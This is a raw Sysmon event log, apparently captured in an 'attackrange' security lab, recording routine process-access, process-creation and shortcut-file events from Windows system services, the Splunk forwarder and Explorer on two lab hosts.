07:44:24.245{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806079Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:24.245{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F2D8-60EB-3B79-00000000D001}1056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806078Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.245{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806077Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:24.245{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806076Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.245{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F2D8-60EB-3B79-00000000D001}1056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806075Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.245{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806074Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.230{0C1E0330-F2D8-60EB-3B79-00000000D001}1056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000001046012Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:24.176{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\Local Disk (C).lnk2021-07-12 07:44:24.176 11241100x80000000000000001046011Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:24.175{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\Temp.lnk2021-07-09 11:41:53.105 23542300x80000000000000001046010Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:24.174{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\Temp.lnkMD5=5B22BDA347FB1CD053579F9F48B338F8,SHA256=DD33F7D15DB8053456579D01FFE48AA9391F24C8F2B5DFDE536A5732F164F069,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001046009Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:24.155{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\Temp.lnk2021-07-09 11:41:53.105 23542300x80000000000000001046008Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:24.155{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\Temp.lnkMD5=98F916204B1BFE6EDCE8A3DE463888FD,SHA256=36216418E32609EA2015155783A773C74BD126B45F7F969E566DCFDDAC17E7B7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001046007Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:24.124{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x80000000000000001046014Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:25.392{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00D126EE42CE3927B38292B34E84F9C3,SHA256=95D734F92F68D2E435F832CCD8D6B7B2A29ED5F375E5D841A8AB06DB3B00D6CC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806117Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.761{0C1E0330-F2D9-60EB-3D79-00000000D001}20001140C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806116Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.620{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F2D9-60EB-3D79-00000000D001}2000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806115Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:25.620{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806114Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.620{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806113Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:25.620{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806112Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.620{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806111Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:25.620{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806110Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.620{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806109Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:25.620{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806108Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.605{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806107Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:25.605{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806106Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.605{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F2D9-60EB-3D79-00000000D001}2000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806105Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.605{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F2D9-60EB-3D79-00000000D001}2000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806104Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.605{0C1E0330-F2D9-60EB-3D79-00000000D001}2000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806103Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.245{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DF65A053BEA574591998FDD9C246F52F,SHA256=09ABFDA1E83743F76CABDC1A5DFC1E5383955AE70D652522DCBC0239EE7C6960,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806102Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:25.245{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D585CE5E9B65BB526C064D826E460672,SHA256=41196DF8BC374D71A5ED3FCD1A2FE9C85BD5EDF0E17B4D870C6BA598ACAFE066,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046015Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:26.453{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AAB55C13808214866890E32204FD29A,SHA256=7274F81BCE994CAA77609B6E985BBDDAC82C0A71FDAA1114C37742694D6A8B02,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806145Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.995{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F2DA-60EB-3F79-00000000D001}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806144Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:26.995{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806143Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 